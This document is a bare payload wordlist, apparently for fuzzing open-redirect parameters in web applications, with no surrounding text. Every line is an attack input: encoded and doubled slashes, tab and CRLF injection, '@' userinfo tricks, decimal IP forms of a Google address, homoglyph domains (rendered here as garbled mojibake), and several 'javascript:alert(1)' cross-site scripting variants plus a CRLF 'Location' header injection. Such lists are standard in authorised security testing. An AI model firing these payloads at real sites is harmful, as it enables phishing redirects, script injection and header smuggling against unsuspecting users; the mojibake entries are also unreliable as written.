
/ã€±bing.com
ã€±bing.com
/ã€±google.com
ã€±google.com
/ã€±localdomain.pw
ã€±localdomain.pw
/ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€±â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€µbing.com
ã€µbing.com
/ã€µgoogle.com
ã€µgoogle.com
/ã€µlocaldomain.pw
ã€µlocaldomain.pw
/ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã‚bing.com
ã‚bing.com
/ã‚google.com
ã‚google.com
/ã‚localdomain.pw
ã‚localdomain.pw
/ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ãƒ¼bing.com
ãƒ¼bing.com
/ï½°bing.com
ï½°bing.com
/ãƒ¼google.com
ãƒ¼google.com
/ï½°google.com
ï½°google.com
/ãƒ¼localdomain.pw
ãƒ¼localdomain.pw
/ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ï½°localdomain.pw
ï½°localdomain.pw
/ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
$2f%2f216.58.214.206%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
%01https://google.com
%01https://localdomain.pw
%01https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%01https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/bing.com
//%09/bing.com
///%09/bing.com
////%09/bing.com
/%09/example.com
//%09/example.com
///%09/example.com
////%09/example.com
/%09/example.com@google.com
//%09/example.com@google.com
///%09/example.com@google.com
////%09/example.com@google.com
/%09/google.com
//%09/google.com
///%09/google.com
////%09/google.com
%09http:///traidnt.net%40bing.com
%09Jav%09ascript:alert(1)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%09/localdomain.pw
//%09/localdomain.pw
///%09/localdomain.pw
////%09/localdomain.pw
/%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/traidnt.net@bing.com
//%09/traidnt.net@bing.com
///%09/traidnt.net@bing.com
////%09/traidnt.net@bing.com
/%09/whitelisted.com@google.com
//%09/whitelisted.com@google.com
///%09/whitelisted.com@google.com
////%09/whitelisted.com@google.com
/%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%09/WillBeReplaced.com@google.com
//%09/WillBeReplaced.com@google.com
///%09/WillBeReplaced.com@google.com
////%09/WillBeReplaced.com@google.com
/%09/www.whitelisteddomain.tld@google.com
//%09/www.whitelisteddomain.tld@google.com
///%09/www.whitelisteddomain.tld@google.com
////%09/www.whitelisteddomain.tld@google.com
/%09/www.whitelisteddomain.tld@localdomain.pw
//%09/www.whitelisteddomain.tld@localdomain.pw
///%09/www.whitelisteddomain.tld@localdomain.pw
////%09/www.whitelisteddomain.tld@localdomain.pw
/%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
%0A/localdomain.pw
%0A/localdomain.pw/?
%0A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
&%0d%0a1Location:https://google.com
/%0D%0Ahttp://bing.com/
/%0D%0Ahttp://bing.com/?
/%0D/bing.com
/%0D/bing.com/?
\152\141\166\141\163\143\162\151\160\164\072alert(1)
172.217.167.46
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
%20//bing.com
%20//bing.com/?
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
%2520%252f%252fbing.com
%252F@localdomain.pw
%252F@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f$2f216.58.214.206
%2f$2f3627734734
%2f$2fgoogle.com
%2f216.58.214.206
%2f216.58.214.206//
%2f216.58.214.206%2f%2f
%2f%2e%2e
/%2f%2f%2fbing.com%2f%3fwww.omise.co
%%2f2fbing.com
/%2f%2fbing.com
/%2f%2fbing.com/?
/%2f%2fexample.com
/%2f%2fgoogle.com
/%2f%2fgoogle.com/?
//%2f%2fgoogle.com
/%2f%2flocaldomain.pw
//%2f%2flocaldomain.pw
/%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f3627734734
%2f3627734734//
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com
%2fgoogle.com//
%2fgoogle.com%2f%2f
/%2F/localdomain.pw
/%2F/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2fxgoogle.com
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//3H6k7lIAiqjfNeN@example.com+@google.com/
//3H6k7lIAiqjfNeN@example.com@google.com/
//3H6k7lIAiqjfNeN@traidnt.net+@bing.com/
//3H6k7lIAiqjfNeN@traidnt.net@bing.com/
//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com@google.com/
//3H6k7lIAiqjfNeN@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@WillBeReplaced.com+@google.com/
//3H6k7lIAiqjfNeN@WillBeReplaced.com@google.com/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tldâº@localdomain.pw/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tldâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/%5cbing.com
//%5cbing.com
///%5cbing.com
////%5cbing.com
/%5cexample.com
//%5cexample.com
///%5cexample.com
////%5cexample.com
/%5cexample.com@google.com
//%5cexample.com@google.com
///%5cexample.com@google.com
////%5cexample.com@google.com
